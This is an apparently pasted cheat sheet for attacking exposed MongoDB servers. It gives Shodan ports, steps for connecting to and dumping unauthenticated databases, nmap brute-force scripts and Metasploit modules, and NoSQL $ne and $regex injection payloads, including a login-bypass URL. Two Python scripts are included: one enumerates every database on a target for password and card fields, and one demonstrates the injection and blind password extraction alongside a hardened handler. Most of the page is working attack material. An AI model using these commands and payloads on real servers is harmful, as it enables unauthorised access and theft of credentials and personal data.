iscomsa

Mongo DB

Mar 24th, 2016
Shodan :
Mongodb
port : 27017 (mongod), 28017 (HTTP status interface on older versions)
Redis : 6379
couchdb : 5984

Tools Automated Assessments (Nosqlmap):

http://github.com/tcstool/nosqlmap

How to attack :
https://github.com/all3g/exploit-exercises/blob/master/mongodb/mongodb_hacking.md


install :
apt-get install mongodb-clients

$ echo 'deb http://downloads-distro.mongodb.org/repo/debian-sysvinit dist 10gen' | sudo tee /etc/apt/sources.list.d/mongodb.list

$ sudo apt-get update
$ sudo apt-get install mongodb-org

$ sudo apt-get install mongodb-org=2.6.0 mongodb-org-server=2.6.0 mongodb-org-shell=2.6.0 mongodb-org-mongos=2.6.0 mongodb-org-tools=2.6.0

$ sudo service mongod start
$ sudo service mongod stop

Note: for a remote target only the client tools are needed (mongodb-clients gives you mongo and mongodump); mongodb-org also installs a local mongod, which is only useful as a lab target.



How to :



Connect to DB:
mongo --port <port> -u <username> -p <password> <IP>
Note: Port 27017 is default value. If the server has no auth at all (the usual case for hosts found via Shodan) just run mongo <IP>; if auth is on and the user was created in the admin database, add --authenticationDatabase admin.

ex: mongo -u foo -p bar 10.10.10.10


Show server info:
db.adminCommand( { "hostInfo" : 1 } )
ex: db.adminCommand( { "hostInfo" : 1 } )
{
  "system" : {
    "currentTime" : ISODate("2014-03-01T14:47:54.379Z"),
    "hostname" : "AwesomePC",
    "cpuAddrSize" : 64,
    "memSizeMB" : 1002,
    "numCores" : 2,
    "cpuArch" : "x86_64",
    "numaEnabled" : false
  },
  "os" : {
    "type" : "Linux",
    "name" : "PRETTY_NAME=\"Debian GNU/Linux 7 (wheezy)\"",
    "version" : "Kernel 3.2.0-4-amd64"
  },
  "extra" : {
    "versionString" : "Linux version 3.2.0-4-amd64 (debian-kernel@lists.debian.org) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 SMP Debian 3.2.63-2+deb7u1",
    "libcVersion" : "2.13",
    "kernelVersion" : "3.2.0-4-amd64",
    "cpuFrequencyMHz" : "2266.747"
  },
  "ok" : 1
}
>


Show users:
show users
-or-
db.runCommand( { usersInfo: 1 } )

ex: show users

Note: both list the users of the current database only; to see every account on the server, use admin and run db.system.users.find().


Show roles:
show roles

ex: show roles


Show databases:
show dbs

ex: show dbs
SecretDB (size of DB)
AwesomeDB (size of DB)
EmptyDB (empty)


Use database:
use <db_name>

ex: use SecretDB


Show tables (called collections):
show tables
-or-
show collections
-or-
db.getCollectionNames()

ex: show tables
fluffy
users


List data in the table/collection:
db.<table_name>.find()

ex: db.users.find()

Note: by default the shell prints only the first 20 documents; type it to page through the rest. Appending .pretty() to the find() gives indented output.

Can also set limit with:
db.<table_name>.find().limit(#)

ex: db.users.find().limit(5)


Search for exact match in the table/collection:
db.<collection_name>.find( { <column_name> : "<value>" } )

ex: db.users.find( { name : "Tony" } )


Wildcard search data in the table/collection:
db.<collection_name>.find( { <column_name> : /<value>/i } )

Note: the i after the closing / makes the search case insensitive

ex: db.users.find( { name : /tony/i } )


Dump the DB for off-line grepping:
mongodump -u <user> -p <pass> -h <IP> --db <db_name>

ex: mongodump -u foo -p bar -h 10.10.10.10 --db SecretDB

Note: Results are dumped to: dump/<db_name>/<collection_name>.bson. The .bson files are binary, so run bsondump <file>.bson to get JSON you can grep. Leave off --db to dump every database on the server, and drop -u/-p when the server has no auth.


Logout:
logout




CAVEATS:
The cat command reads your own files, not the remote system's files
ex: cat ("/etc/shadow") is your own shadow file :( Bummer, I know!
(cat(), load() and the other file helpers are mongo shell functions; they execute on the client side, never on the server.)


find : db.users.find( { "email" : "xxx@xxx.com" } )

insert Data :
db.table.insert({name: "xxx", lnam: "alalala"})



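The enumeration walk above (connect, show dbs, show tables, find().limit(), look for password and card fields) as one script. This is an added example, not code from the original paste. It assumes pymongo is installed for the live path; the host, port and credentials in the usage line are placeholders, and the SENSITIVE keyword list is illustrative. So that it also runs offline, it ships with FakeClient, a stand-in for pymongo built over constructed sample data shaped like the show dbs / show tables output above.

```python
#!/usr/bin/env python3
"""Walk every database/collection on a MongoDB server and flag fields that look
sensitive.  Added example, not from the original paste.  Live use needs pymongo:
    python3 enum_mongo.py 'mongodb://foo:bar@10.10.10.10:27017/?authSource=admin'
or just
    python3 enum_mongo.py 10.10.10.10
when the server has no auth.  With no argument it runs against the constructed
sample data below."""
import sys

# Substrings that make a field name worth a look (illustrative list, extend it).
SENSITIVE = ("pass", "pwd", "secret", "token", "key", "card", "ssn", "email")
SYSTEM_DBS = {"admin", "local", "config"}


def interesting_fields(doc):
    """Keys of one document whose names hint at credentials or PII."""
    return sorted(k for k in doc if any(s in k.lower() for s in SENSITIVE))


def enumerate_server(client, sample=20):
    """show dbs -> show tables -> db.x.find().limit(sample), done for every user
    database.  Returns {(db, collection): {"count", "fields", "sensitive"}}.
    `client` only needs the four pymongo methods used here, so FakeClient works."""
    findings = {}
    for db_name in client.list_database_names():
        if db_name in SYSTEM_DBS:          # skip mongod's own bookkeeping
            continue
        db = client[db_name]
        for coll_name in db.list_collection_names():
            coll = db[coll_name]
            docs = list(coll.find().limit(sample))
            fields, sensitive = set(), set()
            for doc in docs:
                fields.update(doc)
                sensitive.update(interesting_fields(doc))
            findings[(db_name, coll_name)] = {
                "count": coll.count_documents({}),
                "fields": sorted(fields),
                "sensitive": sorted(sensitive),
            }
    return findings


# ---- offline stand-in for pymongo (constructed sample data, not a real host) ----
SAMPLE = {
    "admin": {"system.version": [{"_id": "featureCompatibilityVersion"}]},
    "SecretDB": {
        "users": [
            {"username": "jim", "password": "jim", "email": "jim@gmail.com", "cardnumber": 54321},
            {"username": "tom", "password": "tom", "email": "tom@gmail.com", "cardnumber": 12345},
        ],
        "fluffy": [{"name": "Tony", "likes": "tuna"}],
    },
    "EmptyDB": {},
}


class _Cursor:
    def __init__(self, docs):
        self.docs = docs

    def limit(self, n):
        return iter(self.docs[:n])


class FakeCollection:
    def __init__(self, docs):
        self.docs = docs

    def find(self):
        return _Cursor(self.docs)

    def count_documents(self, flt):
        return len(self.docs)


class FakeDB:
    def __init__(self, colls):
        self.colls = colls

    def list_collection_names(self):
        return list(self.colls)

    def __getitem__(self, name):
        return FakeCollection(self.colls[name])


class FakeClient:
    """Just enough of pymongo.MongoClient for enumerate_server()."""
    def __init__(self, data):
        self.data = data

    def list_database_names(self):
        return list(self.data)

    def __getitem__(self, name):
        return FakeDB(self.data[name])


def main(argv):
    if len(argv) > 1:
        from pymongo import MongoClient        # real target; needs pymongo
        client = MongoClient(argv[1], serverSelectionTimeoutMS=5000)
    else:
        client = FakeClient(SAMPLE)
    for (db, coll), info in enumerate_server(client).items():
        flag = "  <-- " + ", ".join(info["sensitive"]) if info["sensitive"] else ""
        print(f"{db}.{coll}: {info['count']} docs, fields={info['fields']}{flag}")


if __name__ == "__main__":
    main(sys.argv)
```

Pass a full connection URI when the target requires credentials; the script deliberately samples only the first `sample` documents per collection so it stays quiet on large servers, and leaves the full copy to mongodump.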
Wiki :
http://www.mongodbspain.com/wp-content/uploads/2014/03/MongoDBSpain-CheetSheet.pdf
========================================================================

# Vulnerability Assessment

nmap -p 27017 <ipaddress>
nmap -p 27017 -sV <ipaddress>
nmap -p 27017 --script mongodb-brute <ipaddress>
nmap -p 27017 --script mongodb-databases <ipaddress>

Note: mongodb-databases only returns a list when the server accepts unauthenticated commands, so a populated result is already the finding (the mongodb-info script pulls server status and build info the same way).

msf > use auxiliary/scanner/mongodb/mongodb_login
msf > use auxiliary/gather/mongodb_js_inject_collection_enum
msf > use exploit/linux/misc/mongod_native_helper

nmap -p 28017 <ipaddress>
nmap -p 28017 -sV <ipaddress>

http://<ipaddress>:28017/

Note: 28017 is the mongod HTTP status interface: server version, build info, the command line it was started with and, if --rest was enabled, read access to the data. It is disabled by default in later versions and was removed in MongoDB 3.6, so it mainly turns up on old, carelessly configured hosts.

========================================================================

# Attacking Applications

> db.users.find({"username":"jim", "password": {$ne: "0x00"}})
{ "_id" : ObjectId("55d5d719d60515e316247247"), "username" : "jim", "password" : "jim", "email" : "jim@gmail.com", "cardnumber" : 54321 }


The command above fetches every document whose username is "jim" and whose password is anything other than "0x00". The password condition no longer compares against a known value, so jim's record comes back without his password.



> db.users.find({"username": {$ne: "0x00"}, "password": {$ne: "0x00"}})
{ "_id" : ObjectId("55d5d6f2d60515e316247246"), "username" : "tom", "password" : "tom", "email" : "tom@gmail.com", "cardnumber" : 12345 }
{ "_id" : ObjectId("55d5d719d60515e316247247"), "username" : "jim", "password" : "jim", "email" : "jim@gmail.com", "cardnumber" : 54321 }
{ "_id" : ObjectId("55d5d739d60515e316247248"), "username" : "bob", "password" : "bob", "email" : "bob@gmail.com", "cardnumber" : 22222 }


This time both conditions are $ne against a value no real user has, so the filter matches every document and the whole users collection, card numbers included, is returned.

http://localhost/index.php?username[$ne]=test&password[$ne]=test

This is the same operator injection delivered through a web login. PHP fills $_GET from bracketed parameter names, so username[$ne]=test arrives as an array {"username": {"$ne": "test"}}; an application that drops $_GET['username'] and $_GET['password'] straight into its find() filter has built exactly the second query above. The fix is to accept only scalar strings for those two fields (cast them, or reject any key beginning with $) before they reach the driver.
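The login injection above, worked end to end: a PHP-style parameter decoder, the vulnerable handler that feeds the decoded values into the filter, and a hardened one that refuses anything but scalar strings. This is an added example, not code from the original paste or from any real application. It assumes a PHP-style query parser (php_parse_query mimics how $_GET turns username[$ne]=x into an array) and uses a small in-memory matcher in place of MongoDB that models only $ne and $regex; the three user documents are a constructed copy of the page's sample data. It goes one step past the page by including a $regex payload, which is how the same bug is used to extract a password one character at a time.

```python
#!/usr/bin/env python3
"""Operator injection against a login that builds its MongoDB filter from request
parameters.  Added example, not from the original paste.  Assumed: PHP-style
parameter decoding (php_parse_query) and an in-memory stand-in for MongoDB
(find / _matches) that understands only $ne and $regex."""
import re
from urllib.parse import parse_qsl

# Constructed copy of the page's three sample users (ObjectIds dropped).
USERS = [
    {"username": "tom", "password": "tom", "email": "tom@gmail.com", "cardnumber": 12345},
    {"username": "jim", "password": "jim", "email": "jim@gmail.com", "cardnumber": 54321},
    {"username": "bob", "password": "bob", "email": "bob@gmail.com", "cardnumber": 22222},
]


def php_parse_query(query):
    """Decode a query string the way PHP fills $_GET: 'a[b]=c' -> {'a': {'b': 'c'}}."""
    params = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        m = re.fullmatch(r"([^\[]+)\[([^\]]*)\]", key)
        if m:
            base, sub = m.groups()
            if not isinstance(params.get(base), dict):
                params[base] = {}
            params[base][sub] = value
        else:
            params[key] = value
    return params


def _matches(actual, cond):
    """Evaluate one field condition (a subset of MongoDB's query language)."""
    if not isinstance(cond, dict):
        return actual == cond                              # plain equality
    for op, arg in cond.items():
        if op == "$ne":
            ok = actual != arg
        elif op == "$regex":
            ok = isinstance(actual, str) and re.search(arg, actual) is not None
        else:
            raise ValueError(f"operator {op!r} not modelled here")
        if not ok:
            return False
    return True


def find(collection, flt):
    """collection.find(flt) for the operators modelled above."""
    return [doc for doc in collection
            if all(_matches(doc.get(field), cond) for field, cond in flt.items())]


def login_vulnerable(query_string):
    """The bug: whatever PHP decoded goes straight into the filter, operators and all."""
    p = php_parse_query(query_string)
    return find(USERS, {"username": p.get("username"), "password": p.get("password")})


def login_hardened(query_string):
    """Only scalar strings may reach the driver, so no operator can be smuggled in.
    (Real code would compare a password hash; plaintext here matches the sample data.)"""
    p = php_parse_query(query_string)
    user, pw = p.get("username"), p.get("password")
    if not isinstance(user, str) or not isinstance(pw, str):
        return []
    return find(USERS, {"username": user, "password": pw})


if __name__ == "__main__":
    for q in ("username=jim&password=jim",
              "username=jim&password[$ne]=0x00",          # first query on the page
              "username[$ne]=test&password[$ne]=test",     # second query / the URL above
              "username[$ne]=x&password[$regex]=^j"):      # blind extraction, one char at a time
        print(f"{q:42} vulnerable={[d['username'] for d in login_vulnerable(q)]}"
              f"  hardened={[d['username'] for d in login_hardened(q)]}")
```

The $regex case is the practical payoff of the bug: by varying the anchored prefix (^a, ^b, ^ja, ...) and watching which requests log in, an attacker recovers a stored password without ever reading it directly, which is why the hardened handler rejects the whole object rather than filtering individual operators.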